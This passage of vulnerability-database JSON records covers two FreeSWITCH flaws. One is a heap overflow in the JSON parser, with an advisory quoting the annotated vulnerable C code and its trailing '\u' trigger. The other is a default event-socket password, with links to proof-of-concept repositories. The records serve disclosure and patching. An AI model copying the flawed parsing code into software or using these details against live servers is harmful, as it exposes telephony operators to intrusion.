"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:1.6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.4.21",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7392"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Marcello Duarte",
"sources": [
{
"db": "BID",
"id": "76976"
},
{
"db": "PACKETSTORM",
"id": "133781"
}
],
"trust": 0.4
},
"cve": "CVE-2015-7392",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-7392",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-85353",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-7392",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201510-018",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-85353",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Heap-based buffer overflow in the parse_string function in libs/esl/src/esl_json.c in FreeSWITCH before 1.4.23 and 1.6.x before 1.6.2 allows remote attackers to execute arbitrary code via a trailing \\u in a json string to cJSON_Parse. FreeSWITCH is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. \nA remote attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed attempts will likely cause a denial-of-service condition. \nVersions prior to FreeSWITCH 1.6.2 and 1.4.23 are vulnerable. FreeSWITCH is a set of free and open source communication software developed by American software developer Anthony Minesale. The software can be used to create audio, video and short message products and applications. There is a heap-based buffer overflow vulnerability in the \u0027parse_string\u0027 function in the libs/esl/src/esl_json.c file of FreeSWITCH 1.4.21 and earlier versions and 1.6.0. The vulnerability stems from the fact that the cJSON_Parse structure does not sufficiently filter\u0027 json\u0027 character at the end of the string. \ufeff1. Advisory Information\n\nTitle: Heap overflow in freeswitch json parser \u003c 1.6.2 \u0026 \u003c 1.4.23\nSubmitter: Marcello Duarte (marcello@cybersightgroup.com)\nProduct: freeswitch\nProduct URL: http://freeswitch.org\nAffected Versions: freeswitch \u003c 1.6.2 \u0026 \u003c 1.4.23\nFixed Versions: 1.6.2 , 1.4.23\nLink to source code diff:\nhttps://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/cf892528a1a107ed6eb67fb98ed22533e27778fd\nCVE Status: CVE-2015-7392\n\n2. Vulnerability Information\n\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\n\n\n3. Vulnerability Description\n\nProduct Information: FreeSWITCH is a scalable open source\ncross-platform telephony platform designed to route and interconnect\npopular communication protocols using audio, video, text or any other\nform of media. It was created in 2006 to fill the void left by\nproprietary commercial solutions. FreeSWITCH also provides a stable\ntelephony platform on which many applications can be developed using a\nwide range of free tools. \n\nVulnerability:\n\nA carefully crafted json string supplied to cJSON_Parse will trigger a\nheap overflow with user controlled data. \n\nThe underlying vulnerability occurs in the parse_string function. \n\nThis confuses the code responsible for copying the string. Since it\ndoesn\u0027t detect the NULL in this situation, it will keep copying until\nit hits a null in memory. This leads to a heap overflow with user\ncontrolled data. \n\nAny modules or core code which allows user supplied json to enter the\njson parser will be vulnerable. \n\n\nVulnerable Source Code:\n\nstatic const char *parse_string(cJSON *item, const char *str) {\n\n... \n\n/* HACKLOG The length of string is determined here, it will stop\ncounting when it hits a null */\n\n while (*ptr != \u0027\\\"\u0027 \u0026\u0026 *ptr \u0026\u0026 ++len)\n if (*ptr++ == \u0027\\\\\u0027)\n ptr++; /* Skip escaped quotes. */\n\n\n/* HACKLOG The buffer is alloced with the length obtained from the\nprevious section */\n\n out = (char *)cJSON_malloc(\n len + 1); /* This is how long we need for the string, roughly. */\n if (!out)\n return 0;\n\n/* HACKLOG the following code will copy the string into the alloced\nbuffer taking into account utf16 to utf8 conversion */\n\n ptr = str + 1;\n ptr2 = out;\n/* 1 */\n while (*ptr != \u0027\\\"\u0027 \u0026\u0026 *ptr) {\n if (*ptr != \u0027\\\\\u0027)\n *ptr2++ = *ptr++;\n else {\n ptr++;\n switch (*ptr) {\n case \u0027b\u0027:\n *ptr2++ = \u0027\\b\u0027;\n break;\n case \u0027f\u0027:\n *ptr2++ = \u0027\\f\u0027;\n break;\n case \u0027n\u0027:\n *ptr2++ = \u0027\\n\u0027;\n break;\n case \u0027r\u0027:\n *ptr2++ = \u0027\\r\u0027;\n break;\n case \u0027t\u0027:\n *ptr2++ = \u0027\\t\u0027;\n break;\n case \u0027u\u0027: /* transcode utf16 to utf8. */\n if (sscanf(ptr + 1, \"%4x\", \u0026uc) \u003c 1)\n break;\n\n ptr += 4; /* get the unicode char. */\n\n if ((uc \u003e= 0xDC00 \u0026\u0026 uc \u003c= 0xDFFF) || uc == 0)\n break; // check for invalid. \n\n if (uc \u003e= 0xD800 \u0026\u0026 uc \u003c= 0xDBFF) // UTF16 surrogate pairs. \n {\n if (ptr[1] != \u0027\\\\\u0027 || ptr[2] != \u0027u\u0027)\n break; // missing second-half of surrogate. \n if (sscanf(ptr + 3, \"%4x\", \u0026uc2) \u003c 1)\n break;\n ptr += 6;\n if (uc2 \u003c 0xDC00 || uc2 \u003e 0xDFFF)\n break; // invalid second-half of surrogate. \n uc = 0x10000 | ((uc \u0026 0x3FF) \u003c\u003c 10) | (uc2 \u0026 0x3FF);\n }\n\n len = 4;\n if (uc \u003c 0x80)\n len = 1;\n else if (uc \u003c 0x800)\n len = 2;\n else if (uc \u003c 0x10000)\n len = 3;\n ptr2 += len;\n\n switch (len) {\n case 4:\n *--ptr2 = ((uc | 0x80) \u0026 0xBF);\n uc \u003e\u003e= 6;\n case 3:\n *--ptr2 = ((uc | 0x80) \u0026 0xBF);\n uc \u003e\u003e= 6;\n case 2:\n *--ptr2 = ((uc | 0x80) \u0026 0xBF);\n uc \u003e\u003e= 6;\n case 1:\n *--ptr2 = (char)(uc | firstByteMark[len]);\n }\n ptr2 += len;\n break;\n default:\n *ptr2++ = *ptr;\n break;\n }\n\n /* HACKLOG INCREMENTS past null here, causing the while loop to\nnot detect the end of the buffer so it keeps copying past the end of\nthe alloced buffer */\n ptr++;\n }\n\n\n\n4. Vendor Information, Solutions\n\nFreeswitch has released versions 1.6.2 , 1.4.23 which fix the issue. \n\n\n5. Credits\n\nThis vulnerability was discovered and researched by Marcello Duarte (\nmarcello@cybersightgroup.com ) from CYBERSIGHT GROUP Vulnerability\nResearch Labs. \n\n6. Report Timeline\n2015-09-02 - Vulnerability found\n2015-09-13 - Freeswitch developers contacted\n2015-09-14 - Freeswitch developers verified bug and patched in master\n2015-09-25 - Freeswitch releases fixed packages. \n2015-09-20 - CVE requested\n2015-09-29 - CVE issued, Advisory released\n\n7. About CYBERSIGHT GROUP\n\nCYBERSIGHT GROUP is an organization of security professionals\nspecializing in several areas of offensive computer security research. \nWe specialize in vulnerability research, exploit development, reverse\nengineering and cyber attack planning. http://cybersightgroup.com ,\ncontact@cybersightgroup.com\n\n\n8. Disclaimer\n\nThe information provided in the advisory is provided as is without any\nwarranty. CYBERSIGHT GROUP and it\u0027s members are not liable in any case\nof damage, direct or indirect. Permission to redistribute the\nadvisory in it\u0027s unmodified form is granted. \n\n\n\n\n-- \nMarcello Duarte\nChief Research Officer\nCYBERSIGHT GROUP\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "BID",
"id": "76976"
},
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "PACKETSTORM",
"id": "133781"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-85353",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7392",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "133781",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201510-018",
"trust": 0.7
},
{
"db": "BID",
"id": "76976",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-85353",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "BID",
"id": "76976"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "PACKETSTORM",
"id": "133781"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"id": "VAR-201510-0226",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:39:13.564000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://freeswitch.org/"
},
{
"title": "FS-8160: properly handle malformed json when parsing json with \\u at the end of a json string",
"trust": 0.8,
"url": "https://freeswitch.org/stash/projects/fs/repos/freeswitch/commits/cf8925"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://freeswitch.org/stash/projects/fs/repos/freeswitch/commits/cf8925"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/133781/freeswitch-heap-overflow.html"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/536569/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7392"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7392"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/536569/100/0/threaded"
},
{
"trust": 0.4,
"url": "https://freeswitch.org/stash/projects/fs/repos/freeswitch/commits/cf892528a1a107ed6eb67fb98ed22533e27778fd"
},
{
"trust": 0.3,
"url": "http://www.freeswitch.org/"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/sep/137"
},
{
"trust": 0.1,
"url": "http://freeswitch.org"
},
{
"trust": 0.1,
"url": "http://cybersightgroup.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7392"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "BID",
"id": "76976"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "PACKETSTORM",
"id": "133781"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-85353"
},
{
"db": "BID",
"id": "76976"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"db": "PACKETSTORM",
"id": "133781"
},
{
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-85353"
},
{
"date": "2015-09-29T00:00:00",
"db": "BID",
"id": "76976"
},
{
"date": "2015-10-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"date": "2015-09-30T03:03:33",
"db": "PACKETSTORM",
"id": "133781"
},
{
"date": "2015-10-05T14:59:01.703000",
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"date": "2015-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-85353"
},
{
"date": "2015-09-29T00:00:00",
"db": "BID",
"id": "76976"
},
{
"date": "2015-10-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-005082"
},
{
"date": "2018-10-09T19:58:08.220000",
"db": "NVD",
"id": "CVE-2015-7392"
},
{
"date": "2015-10-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH of libs/esl/src/esl_json.c of parse_string Heap-based buffer overflow vulnerability in functions",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-005082"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201510-018"
}
],
"trust": 0.6
}
}
VAR-201912-1437
Vulnerability from variot - Updated: 2023-12-18 13:28FreeSWITCH 1.6.10 through 1.10.1 has a default password in event_socket.conf.xml. FreeSWITCH Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201912-1437",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lte",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.1"
},
{
"model": "freeswitch",
"scope": "gte",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.6.10"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.6.10 to 1.10.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.10.1",
"versionStartIncluding": "1.6.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19492"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Inc.,Johnson Controls, reported this vulnerability to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
],
"trust": 0.6
},
"cve": "CVE-2019-19492",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-19492",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-151944",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-19492",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-19492",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201912-010",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-151944",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-19492",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH 1.6.10 through 1.10.1 has a default password in event_socket.conf.xml. FreeSWITCH Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "VULMON",
"id": "CVE-2019-19492"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-19492",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "47698",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-301-01",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021102908",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3614",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201912-010",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-151944",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-19492",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
},
{
"db": "CNNVD",
"id": "CNNVD-201912-010"
}
]
},
"id": "VAR-201912-1437",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-151944"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:28:19.554000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://freeswitch.com/"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/chocapikk/cve-2019-19492 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/tucommenceapousser/cve-2019-19492-2 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/tucommenceapousser/cve-2019-19492 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-19492"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-151944"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-013064"
},
{
"db": "NVD",
"id": "CVE-2019-19492"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.exploit-db.com/exploits/47698"
},
{
"trust": 1.4,
